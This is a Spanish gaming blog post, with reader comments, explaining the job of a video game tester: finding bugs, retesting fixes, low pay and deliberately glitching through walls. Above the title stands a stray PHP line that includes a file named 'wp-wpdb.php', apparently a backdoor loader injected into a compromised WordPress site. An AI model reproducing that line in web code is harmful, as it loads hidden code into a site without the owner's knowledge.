if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Game Tester: ¿cuál es su función? – La Fortaleza de LeChuck

Game Tester: ¿cuál es su función?

Cuenta la leyenda que hace mucho tiempo el trabajo abundaba en nuestro país y que había personas que tenían todo lo que siempre habían soñado. Estoy seguro que muchos habéis pensado que trabajar como Game Tester (probador de videojuegos) es el mejor trabajo del mundo. Posiblemente lo sea, no voy a ser yo el que os diga que no, pero, ¿sabemos realmente que es lo que hace un tester? ¿es la fuente de la eterna juventud de los trabajos, el arca perdida de los gamers parados, la cámara secreta de los que compraron Wonderbook: El Libro de los Hechizos?

Los testers se encargan de buscar errores. Podríamos decir que un tester realiza bien su trabajo si, con una alta probabilidad, detecta errores todavía no descubiertos. Por consiguiente, una prueba (test) que detecta un error todavía no descubierto es una prueba exitosa.
Los testers no trabajan con software disponible, su labor comienza antes de que dicho software este terminado ya que las pruebas ponen de manifiesto la existencia de errores o defectos y se supone que un juego no puede salir al mercado con fallos aunque todos sabemos que a veces si lo hace y todos sabemos cual es la forma de proceder de las empresas: actualizaciones, parches, etc.

En ocasiones, el propio tester es el encargado de identificar la causa de los errores y realizar las correcciones pertinentes, a este proceso se le denomina depuración, pero en la gran mayoría de casos los testers solo se encargan de su búsqueda. Por lo general, las pruebas que realizan los testers no incluyen la corrección de defectos (de esto se encargan los desarrolladores) pero aseguran que los cambios realizados han sido comprobadas confirmando así que los cambios o correcciones han sido efectivos. No hace falta decir que las pruebas se repiten las veces que haga falta para asegurar su efectividad.

Las pruebas son exhaustivas ya que los jugadores somos, por decirlo de algún modo, muy curiosos. Nos encanta investigar todos los rincones y posibilidades de los juegos que adquirimos, algo lógico ya que hemos pagado por ellos, y a veces, y a menudo muy a nuestro pesar, encontramos fallos divertidos, raros y escandalosos. Tanto las pruebas como la depuración son necesarias para conseguir un producto de calidad.
Este es un reportaje que realizó un equipo de Comando Actualidad hace un tiempo, retrata, rápidamente, el entorno de trabajo de un tester. ¿Cobrar por jugar es realmente un chollo?

Ahora sabéis, si aún no lo sabíais, cual es la función del tester. Su función es vital en el desarrollo de videojuegos y gracias a ellos no encontramos ningún error en nuestros títulos favoritos.

Publicada el
Categorizado como Reportaje

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

9 comentarios

  1. Para mí el video esta muy maquillado por la tele para que parezca que realmente es un sueño, y si, tener que estar chocando contra las paredes todo el rato y mierdas de esas, o verte obligado a jugar un juego que no te gusta, es eso, trabajar, y no es el paraíso.

  2. El trabajo de tester no es para nada un chollazo. No deja de ser un trabajo como otro cualquiera, con sus responsabilidades, marrones, cagadas y, también, momentos buenos.

    Pero la labor de tester no consiste en jugarse al juego 50 veces y sacarse todos los logros y secretos, como hacemos cuando jugamos en nuestras casas.

    Consiste en ir a reventar el juego. A ver en qué

    1. Exacto, "reventar un juego", como tú dices, no es tan divertido como "quemarlo". Seguro que el clima de trabajo es genial y pasan ratos divertidos pero el trabajo es el trabajo. Tienes toda la razón del mundo en cuanto a lo referente al salario. Respecto a otros puestos, es bastante bajo, aún así, su función sigue siendo vital en el proceso de desarrollo de un videojuego.

    1. Tienes que jugar al juego que te toque y punto, pero no sólo de manera normal, sino también haciendo el gil*****as (es así) a ver si el juego hace algo raro. Por ejemplo, en Gran Turismo 3 y 4 hay circuitos en los que, si te chocas a toda velocidad justo en una determinada esquina colisionando con las dos paredes JUSTO al mismo tiempo, puedes atravesar la pared. Ya te harás a la idea de que es algo que no harías normalmente, pero como «tester» de videojuegos deberás hacer para que los desarrolladores arreglen el fallo. Hay páginas como Game Tester donde abren las puertas a esta profesión; te dan dinero en forma de su propia moneda de cambio que puedes gastar en videojuegos terminados o cambiar por pasta «real», y obviamente NO tienes que pagar por probar los que no están acabados.

      1. Personalmente considero que primero hay que jugar de manera normal, por si hay algún error que sea especialmente vital corregir, como que, si matas a todos los rivales CPU en un juego de combates o de tiros, sigas en el mapa en lugar de terminarse la partida; ya después se empezaría a hacer el «retrased perdided» por todo el juego.

  3. Creo que falta destacar que los ‘testers’ no sólo juegan de manera normal, sino también de un modo «extraño»: se chocan con todas las paredes que encuentran, saltan encima de cuanto pillan incluyendo personajes y picos, hacen el «monguer» arrimándose a las esquinas (es muy frecuente que se puedan atravesar si no están depuradas), comprueban que la función de reaparición no haga que se teletransporten fuera del mapa… Yo a veces hago eso, encontrar glitches y bugs también me entretiene. La esquina sobresaliendo de Special Stage Route 11 II en Gran Turismo 3 (atravesar una pared por restregarse contra la esquina que forma con otro muro), la pared «glitcheada» de Camden en el primer Need for Speed Most Wanted (https://m.youtube.com/watch?v=ytgv7hh7N1Q), la valla del mapa multijugador de Catacrom IV que se puede cruzar en Ratchet Gladiator (pasar por un muro invisible y luego saltar en un palo de la valla)… Etcétera.

Dejar un comentario